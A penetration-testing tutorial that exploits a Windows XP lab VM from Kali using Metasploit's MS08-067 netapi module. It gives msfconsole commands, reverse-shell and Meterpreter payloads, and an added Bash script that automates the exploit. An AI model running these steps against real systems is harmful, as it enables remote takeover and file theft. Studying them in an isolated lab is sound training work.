How to Exploit Windows XP Using Metasploit

Before exploiting a system, we need to know which vulnerabilities it has that we can actually exploit. Metasploit makes it easy for pentesters to find, exploit, and validate those vulnerabilities. So, in this post, I’m going to exploit Windows XP from my Kali Linux over a host-only network connection using Metasploit.

First, we need to put both virtual machines on the same host-only network so they can reach each other.
To do that, open the Kali VM’s Settings from the VM menu (shown in the picture below)

Then, choose Host-only as the network connection.

After you click OK, open the Windows XP VM’s Settings the same way, but this time choose Custom and point it at the same host-only virtual network.

Then, I want to add a new IP address on my Kali Linux that will later be used as my local host, or LHOST. Type sudo ifconfig eth0:0 <your desired IP address> netmask <your desired netmask> in your terminal; eth0:0 is an alias on eth0 (use your own interface name if it is not eth0), and the address must be in the same subnet as the Windows XP machine. To test whether the connection between the two machines is established, ping the other computer from each side. If it replies with 0% packet loss, the connection is set up. If the ping works from Windows XP but not from Kali, the XP firewall is probably dropping inbound traffic; it would block port 445 too, which this exploit needs, so fix that before going on.

pinging the Windows XP’s IP address from my Kali Linux

pinging the Kali Linux’s IP address from my Windows XP

If you do not know your Windows XP’s IP address, find it by typing ipconfig in the command prompt.

Now that the connection between the two machines is established, we can start preparing for the exploitation step.

First things first, start Metasploit by typing msfconsole in your terminal.

Metasploit’s interface

Metasploit ships with more than 1500 exploit modules that we can use against different targets. To see the existing exploits, type show exploits and the list of modules with their descriptions will appear; when you already know what you are after, search ms08-067 is quicker than paging through the whole list. Metasploit keeps adding modules, so make sure you update it regularly.

List of exploits shown by ‘show exploits’

In this post, I am going to use the MS08-067 Microsoft Server Service Relative Path Stack Corruption vulnerability in Windows XP, better known as netapi, as my way in. Type use exploit/windows/smb/ms08_067_netapi (the shorter use windows/smb/ms08_067_netapi also works).

The next thing to do is to set RHOST (Remote Host), the target, and LHOST (Local Host), the address the reverse payload will connect back to. In this case, Windows XP is the remote host and Kali Linux is the local host. LHOST must be an address the target can actually reach, which is why the alias IP in Windows XP’s subnet was added earlier. Newer Metasploit versions name the target option RHOSTS, but set RHOST is still accepted as an alias.

We can check whether RHOST and LHOST have been set by typing show options. In this picture, I haven’t set anything yet, since RHOST is still empty.

To set them, type set RHOST <Windows XP IP address> and set LHOST <Kali IP address>.

Setting up the IP addresses for RHOST and LHOST

Now, the only thing left to do is to start the exploitation by typing the exploit command. It is worth running check first: this module fingerprints the target and reports whether it looks vulnerable without firing the exploit. The module picks the target automatically; if it cannot identify the OS and language build, choose the right one from show targets rather than guessing, because a wrong target crashes the Server service instead of giving us a session.

You might be wondering what we can do at this point. The default payload for this module is Meterpreter, so the help command lists all the Meterpreter commands available in the session.

To check that I had landed on the target I meant to exploit, I ran the screenshot command, which captures the target’s screen at that moment and saves the image on the Kali side.

my Windows XP’s screen

Executing the screenshot command

My root folder where the image is saved

Here’s the screenshot picture from Metasploit

There is a lot more we can do than screenshot the target’s screen. But during a penetration test, our goal is to get shell access so that we have full control of the computer.

From the Meterpreter session that this netapi exploit gives us, the shell command drops us into a Windows command prompt (cmd.exe) on the target.

Or you can set the payload before you exploit the target, by typing set PAYLOAD windows/shell/reverse_tcp; Metasploit confirms with PAYLOAD => windows/shell/reverse_tcp, and exploit then returns a plain command shell instead of a Meterpreter session.

We get shell access directly <3

Now that we have shell access, we can do just about anything with the computer, for example pull important files off the target.
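As an added example that is not part of the original post, the following Bash script collects the manual steps above (the eth0:0 alias, the ping check, and the msfconsole commands) and drives msfconsole through a resource script instead of typing each command. The addresses 192.168.56.10 and 192.168.56.20, the alias eth0:0 and the netmask are assumed lab values (override them via the environment); it adds a check run before exploit and lets you pick either payload discussed above.

```bash
#!/usr/bin/env bash
# Added example, not code from the original post: scripts the lab setup and
# the msfconsole steps described above. The addresses and interface name are
# assumptions for a host-only lab (override them via the environment).
KALI_IFACE="${KALI_IFACE:-eth0:0}"          # alias on eth0, as in the post
LHOST="${LHOST:-192.168.56.10}"             # Kali, used by the reverse payload
RHOST="${RHOST:-192.168.56.20}"             # Windows XP target
NETMASK="${NETMASK:-255.255.255.0}"
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"   # or windows/shell/reverse_tcp

# Add the alias address on Kali (the `ifconfig eth0:0 ...` step).
add_alias_ip() {
    sudo ifconfig "$KALI_IFACE" "$LHOST" netmask "$NETMASK"
}

# Read ping output on stdin and succeed only on a 0% loss summary.
# Matches Linux ("..., 0% packet loss, ...") and Windows ("(0% loss)") but
# not "10% packet loss" or "100% packet loss".
ping_ok() {
    grep -Eq '(^|[ (])0% (packet )?loss'
}

# Ping the target and check the summary; returns non-zero on any loss.
target_reachable() {
    ping -c 4 "$RHOST" | ping_ok
}

# Write an msfconsole resource script that repeats the manual steps:
# select the module, set the hosts and payload, run check, then exploit.
write_rc() {
    cat > "$1" <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOST $RHOST
set LHOST $LHOST
set PAYLOAD $PAYLOAD
show options
check
exploit
EOF
}

# Full run: bring up the alias, verify the link, then hand the script to msfconsole.
run_lab() {
    add_alias_ip
    if ! target_reachable; then
        echo "no reply from $RHOST: check the VM network settings or the XP firewall" >&2
        return 1
    fi
    rc="$(mktemp)"
    write_rc "$rc"
    msfconsole -q -r "$rc"
}

# Only run when invoked with "run", so sourcing the file just loads the functions.
if [ "${1:-}" = "run" ]; then
    run_lab
fi
```

Run it with bash exploit_xp.sh run on Kali; without the argument it only defines the functions, so the file can be sourced. msfconsole -r executes the resource script line by line, exactly as if the commands were typed at the prompt. If you want check to gate the attack, remove the exploit line from write_rc and fire it by hand once check reports the target as vulnerable.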